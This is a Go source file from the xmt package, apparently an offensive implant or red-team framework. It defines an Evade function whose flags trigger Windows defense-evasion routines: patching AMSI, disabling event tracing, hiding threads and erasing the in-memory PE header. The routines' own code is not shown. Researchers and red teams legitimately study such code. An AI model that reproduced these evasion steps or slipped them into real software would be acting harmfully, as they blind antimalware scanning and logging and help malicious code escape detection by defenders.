github.com/iDigitalFlame/xmt@v0.5.4/device/evade_windows.go (about) 1 //go:build windows 2 // +build windows 3 4 // Copyright (C) 2020 - 2023 iDigitalFlame 5 // 6 // This program is free software: you can redistribute it and/or modify 7 // it under the terms of the GNU General Public License as published by 8 // the Free Software Foundation, either version 3 of the License, or 9 // any later version. 10 // 11 // This program is distributed in the hope that it will be useful, 12 // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 // GNU General Public License for more details. 15 // 16 // You should have received a copy of the GNU General Public License 17 // along with this program. If not, see <https://www.gnu.org/licenses/>. 18 // 19 20 package device 21 22 import "github.com/iDigitalFlame/xmt/device/winapi" 23 24 // Evade will attempt to apply evasion techniques specified by the bitmask flag 25 // value supplied. 26 // 27 // The flag values are in the form of 'Evade*' and are platform specific. 28 // 29 // Any errors that occur during execution will stop the other evasion tasks 30 // scheduled in this function flags. 31 func Evade(f uint8) error { 32 if f&EvadeWinPatchAmsi != 0 { 33 if err := winapi.PatchAmsi(); err != nil { 34 return err 35 } 36 } 37 if f&EvadeWinPatchTrace != 0 { 38 if err := winapi.PatchTracing(); err != nil { 39 return err 40 } 41 } 42 if f&EvadeWinHideThreads != 0 { 43 if err := winapi.HideGoThreads(); err != nil { 44 return err 45 } 46 } 47 if f&EvadeEraseHeader != 0 { 48 if err := winapi.ErasePEHeader(); err != nil { 49 return err 50 } 51 } 52 return nil 53 }